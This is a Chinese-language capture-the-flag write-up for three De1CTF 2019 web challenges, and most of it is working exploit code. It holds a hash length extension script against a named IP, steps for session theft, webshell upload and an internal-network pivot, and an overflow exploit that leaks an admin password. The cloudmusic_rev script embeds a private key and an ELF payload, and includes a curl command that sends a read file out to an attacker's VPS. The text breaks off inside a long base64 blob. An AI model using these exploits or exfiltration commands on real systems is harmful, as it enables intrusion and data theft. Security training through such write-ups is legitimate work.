2019 De1CTF Web wp

0x01 SSRF ME

这题没什么难度,就不多说了,根据代码逻辑构造hash拓展攻击,坑的就是找flag找了半天,找到了然后放提示了......直接贴代码

# -*- coding: utf-8 -*-
import requests
import hashpumpy
import urllib.parse as change

readfile = 'flag.txt'
url1 =  'http://139.180.128.86/geneSign?param=' + readfile
req = requests.get(url = url1)
sign = req.content
hash_sign = hashpumpy.hashpump(sign, readfile + 'scan', 'read', 16)
sign_next = hash_sign[0]
action_next = change.quote(hash_sign[1][len(readfile):])
url2 = 'http://139.180.128.86/De1ta?param='+readfile
result = requests.get(url = url2, cookies={'sign': sign_next, 'action': action_next})
print(result.content)

0x02 shellshellshell

第一层登录和去年的N1ctf的easyphp源码基本一样的,所以漏洞点也是基本一样的,github上有人写了easyphp的漏洞利用脚本https://github.com/rkmylo/ctf-write-ups/tree/master/2018-n1ctf/web/easy-php-540,可以用ssrf脚本抓取到admin用户的session


直接利用session登录admin用户,题目在admin用户的上传点没有做限制,可以上传任意文件,所以直接上传一个shell就好。


而且在上传点提示了flag在内网里,所以上传个shell后目的也很明确,去看一下/etc/hosts

127.0.0.1   localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.18.0.3  df459fa2cbad

有一个172.18.0.3的内网地址,所以搭个代理出来扫描一下C段地址(强烈安利一波FCN),扫描到172.18.0.2上开了80端口,上来就是一个代码审计

<?php
    $sandbox = '/var/sandbox/' . md5("prefix" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);

    if($_FILES['file']['name'])
    {
        $filename = !empty($_POST['file']) ? $_POST['file'] : $_FILES['file']['name'];
        if (!is_array($filename)) 
        {
            $filename = explode('.', $filename);
        }
        $ext = end($filename);
        if($ext==$filename[count($filename) - 1])
        {
            die("try again!!!");
        }
        $new_name = (string)rand(100,999).".".$ext;
        move_uploaded_file($_FILES['file']['tmp_name'],$new_name);
        $_ = $_POST['hello'];
        if(@substr(file($_)[0],0,6)==='@<?php')
        {
            if(strpos($_,$new_name)===false)
            {
                include($_);
            }
            else
            {
                echo "you can do it!";
            }
        }
        unlink($new_name);
    }
    else
    {
        highlight_file(__FILE__);
    }

emmmm,以前pwnhub的一个原题,上海赛又用了一次,贴下wp的地址:https://cloud.tencent.com/developer/article/1360551,跟着wp操作就可以上传一个shell.php,然后包含就可以Getsgell了,最后在/etc下找到了flag


0x03 cloudmusic_rev

这个题目的1.0版本再国赛总决赛题中有放出,该题为2.0版本,所以攻击流程和原题差不太多,参考:https://github.com/impakho/ciscn2019_final_web1

相比国赛总决赛增加了‘.php’的过滤,但是返回值给了提示urlencode。urlencode编码后再base64编码,成功绕过,可以实现任意文件读取。

并且上传溢出admin密码的长度变了,之前是0x300,现在是0x70。

所以在原题的exp基础上修改溢出长度

def upload_music():
    url = site_url + '/hotload.php?page=upload'
    data = {'file_id': '0'}
    music = preset_music[:0x6] + '\x00\x00\x03\x00' +preset_music[0x0a:0x53]
    music += '\x00\x00\x03\x00' + '\x00\x00\x03' + 'a' * 0x70 + '\x00'
    files = {'file_data': music}
    if logging: print(url)
    if logging: print(data)
    res = post(1, url, data, files)
    if logging: print(res.text)
    if '"status":1' in res.text:
        try:
            return b64decode(json.loads(res.content.strip())['artist'])[:16]
        except:
            return ''
    return ''

溢出得到admin用户的密码:Mike84eiNxHcMVCz,查看firmware.php代码

<?php
if (!isset($_SESSION['user'])||strlen($_SESSION['user'])<=0){
    ob_end_clean();
    header('Location: /hotload.php?page=login&err=1');
    die();
}
if ($_SESSION['role']!='admin'){
    $padding='Lorem ipsum dolor sit amet, consectetur adipisicing elit.';
    for($i=0;$i<10;$i++) $padding.=$padding;
    die('<div><div class="container" style="margin-top:30px"><h3 style="color:red;margin-bottom:15px;">Only admin is permitted.</h3></div><p style="visibility: hidden">'.$padding.'</p></div>');
}

if (isset($_FILES["file_data"])){
    if ($_FILES["file_data"]["error"] > 0||$_FILES["file_data"]["size"] > 1024*1024*1){
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'upload err, maximum file size is 1MB.')));
    }else{
        mt_srand(time());
        $firmware_filename=md5(mt_rand().$_SERVER['REMOTE_ADDR']);
        $firmware_filename=__DIR__."/../uploads/firmware/".$firmware_filename.".elf";
        if (time()-$_SESSION['timestamp']<3){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'too fast, try later.')));
        }
        $_SESSION['timestamp']=time();
        move_uploaded_file($_FILES["file_data"]["tmp_name"], $firmware_filename);
        $handle = fopen($firmware_filename, "rb");
        if ($handle==FALSE){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'upload err, unknown fault.')));
        }
        $flags = fread($handle, 4);
        fclose($handle);
        if ($flags!=="\x7fELF"){
            unlink($firmware_filename);
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'upload err, not a valid elf file.')));
        }
        ob_end_clean();
        die(json_encode(array('status'=>1,'info'=>'upload succ.')));
    }
}else{
    if (isset($_SERVER['CONTENT_TYPE'])){
        if (stripos($_SERVER['CONTENT_TYPE'],'form-data')!=FALSE){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'upload err, maximum file size is 1MB.')));
        }
    }
}

@$path=$_POST['path'];

function clean_string($str){
    $str=str_replace("\\","",$str);
    $str=str_replace("/","",$str);
    $str=str_replace(".","",$str);
    $str=str_replace(";","",$str);
    return substr($str,0,32);
}

if (isset($path)){
    $path=clean_string(trim((string) $path));
    if (strlen($path)<=0||strlen($path)>64){
        ob_end_clean();
        die(json_encode(array('status'=>0,'info'=>'Format or length check failed.')));
    }else{
        $firmware_filename=__DIR__."/../uploads/firmware/".$path.".elf";
        if (!file_exists($firmware_filename)){
            ob_end_clean();
            die(json_encode(array('status'=>0,'info'=>'File not found.')));
        }else{
            try{
                $elf = FFI::cdef("
                    extern char * version;
                ", $firmware_filename);
                $version=(string) FFI::string($elf->version);
                if ($version === "cloudmusic_rev"){
                    ob_end_clean();
                    die(json_encode(array('status'=>1,'info'=>'Firmware version is cloudmusic_rev.')));
                }else{
                    ob_end_clean();
                    die(json_encode(array('status'=>0,'info'=>'Bad version.')));
                }
            }catch(Error $e){
                ob_end_clean();
                die(json_encode(array('status'=>0,'info'=>'Fail when loading firmware.')));
            }
        }
    }
}
?>

其中相较于1.0,代码中上传后文件名的命名方式变了

$firmware_filename=md5(mt_rand().$_SERVER['REMOTE_ADDR']);

即用时间和公网IP地址的MD5值来生成文件名,并且固件被加载后,执行内容不会返回。所以需要利用curl讲执行结果带出到vps上。修改原题中的exp:

#!/usr/bin/python2
#coding:utf-8

from sys import *
from base64 import *
from Crypto.PublicKey import RSA
import requests
import string
import time
import hashlib
import random
import json
from datetime import datetime

timeout = 1.0
retry_count = 5
logging = 1

site_url = ''
s = requests.session()
time_zone_offset = 60 * 60 * 8
command = "curl http://[your vps]/`/usr/bin/tac /fl*g*`"
# command = "ls"

preset_key = b64decode('LS0tLS1CRUdJTiBQUklWQVRFIEtFWS0tLS0tCk1JSUNkd0lCQURBTkJna3Foa2lHOXcwQkFRRUZBQVNDQW1Fd2dnSmRBZ0VBQW9HQkFPTWp4eXVIcWRuSmFyUDAKSHl1eFVVRHkvY1BGaWMzYjM5WUQrVzY5R2VSRkpMRDUraFhaM3lYMTFBQ2pMSHpESFpIbGgrajRQZncxdEhMMApwY3FPZmJ0TTF4am5sV2FKd3lZQzRpWlBSRXJUTGNVd282UmhKS2diUkxHQVpLUmxmWFFMbVRwbGd0ZnJoUGhJCng0ZzM2ZEtLTVVlYjZnOHJ3blVrUnVYSVlhd2hBZ01CQUFFQ2dZRUEwUWZrQzFOV0pHOFFHM3ZXRThlakZ6cUgKL3RxVDd6Y2h6enJwR2RnOU02M09EbkIramcxckp1d01wbW1FVDJ6Z2tadkNiOHZFZjQ2TStoM2JWWVc4Zmg1Zwp4dTlXdmJFb0orUGZtV2R6SmowUlRYT05vZXVzRUgwODI3eGl6UXlIc21RbkNBQzkyUS9IQlg4WVl0eDgxN0pOCnNIUmNFMHdacVFmL0dkU0VnK0VDUVFEMGVjUlJYN3BsT0hTOHNjTjFqT3FOMEl5S2pvamljWWNQL2h3ckU2ZjIKZGR3dEpnNlJBb3E3SHlRdUFjYmZCazJwdS9UeDRsSHRycm9qRXlxQTRLdjdBa0VBN2RqUEFCakEvaHlpV1oxTQpDUm5DTTRudWdDUEE1SXRxZktzb3UvbE51cUdYZXFVYW5XNjBTcmJDVWJrM2g2NnkwdXV2T0xzendEWllONnNNClFEWFJrd0pBUlB3N1BtOFJ6TkF5ZUxCOHBDWUFaY1lNY21pb0RhWFZZOWpqbi9BcS9Ddmoxa1dmNUtGZi9rOWEKU1RVdEplL0VhSG5tTTM4V2VVaE5zK29MbTFSS2t3SkFNcCtyNTJ4ZFgzaSt3VzR1YWQxMnJUdVZiT2F2UHJYQgowNGttb1dPOXZKUjZSbHR2MzhSWlVYRzJ5R2d3dm90YmVuTTVsMHlaQmpkSzdZWlZsREVnU3dKQkFMb29yYmZnCkJzMW5BbGU3WnhXK0JkRXlLVG9ZUWdWVU1MRytWeDFITW9rU0dZNlh6blNFYzdpK25weFBoeGd6Q1VWdHpxNU4KR3E4Q3ppN2FJUFVuY0lnPQotLS0tLUVORCBQUklWQVRFIEtFWS0tLS0tCg==')
preset_music = b64decode('SUQzBAAAAAABBFRSQ0sAAAADAAADMQBUSVQyAAAAEgAAA2JiYmJiYmJiYmJiYmJiYmIAVEFMQgAAABIAAANjY2NjY2NjY2NjY2NjY2NjAFRQRTEAAAASAAADYWFhYWFhYWFhYWFhYWFhYQA=')
preset_firmare = b64decode('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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7AhIiwXVLwAASIXAdAL/0EiDxAjDAAAAAAAAAAAA/zXiLwAA/yXkLwAADx9AAP8l4i8AAGgAAAAA6eD/////JdovAABoAQAAAOnQ/////yXSLwAAaAIAAADpwP////8lyi8AAGgDAAAA6bD/////JYIvAABmkAAAAAAAAAAASI09wS8AAEiNBbovAABIOfh0FUiLBT4vAABIhcB0Cf/gDx+AAAAAAMMPH4AAAAAASI09kS8AAEiNNYovAABIKf5Iwf4DSInwSMHoP0gBxkjR/nQUSIsFFS8AAEiFwHQI/+BmDx9EAADDDx+AAAAAAIA9aS8AAAB1L1VIgz32LgAAAEiJ5XQMSIs9Ki8AAOhd////6Gj////GBUEvAAABXcMPH4AAAAAAww8fgAAAAADpe////1VIieVIg+wQSIsFpC4AAEiLALowAQAAvgAAAABIicfo9/7//0iNNaAOAABIjT2hDgAA6PT+//9IiUX4SIN9+AB0MUiLBWouAABIiwBIi1X4SInRugABAAC+AQAAAEiJx+iW/v//SItF+EiJx+ia/v//6wGQycMASIPsCEiDxAjDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA